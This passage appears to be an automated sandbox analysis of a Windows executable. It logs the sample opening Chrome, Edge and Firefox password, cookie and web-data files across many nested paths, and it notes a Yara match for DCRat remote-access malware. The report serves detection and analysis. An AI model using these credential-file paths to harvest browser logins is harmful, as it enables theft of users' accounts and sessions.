Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies-journal	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web Data-journal	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journal	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies-journal	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web Data-journal	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journal	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\Login Data-journal	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\AppData\Local\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies-journal	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journal	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\Extension Cookies	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\AppData\Local\Application Data\Microsoft\Edge\User Data\Default\Login Data-journal	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journal	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Local State	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web Data-journal	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Login Data-journal	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journal	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journal	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journal	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web Data-journal	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web Data-journal	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies-journal	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Local State	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journal	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web Data-journal	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journal	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Local State	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies-journal	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Default\Web Data-journal	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies-journal	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journal	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journal	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journal	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journal	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journal	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data-journal	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journal	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journal	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web Data-journal	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journal	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies-journal	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Default\Extension Cookies	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies-journal	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journal	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web Data-journal	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\Local Settings\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journal	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journal	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\AppData\Local\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data-journal	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\Extension Cookies-journal	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journal	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File opened: C:\Users\user\Local Settings\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior

Remote Access Functionality

Yara detected DCRat

Source: Yara match	File source: 0000000C.00000002.3319845623.0000000003477000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.3319845623.0000000003810000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
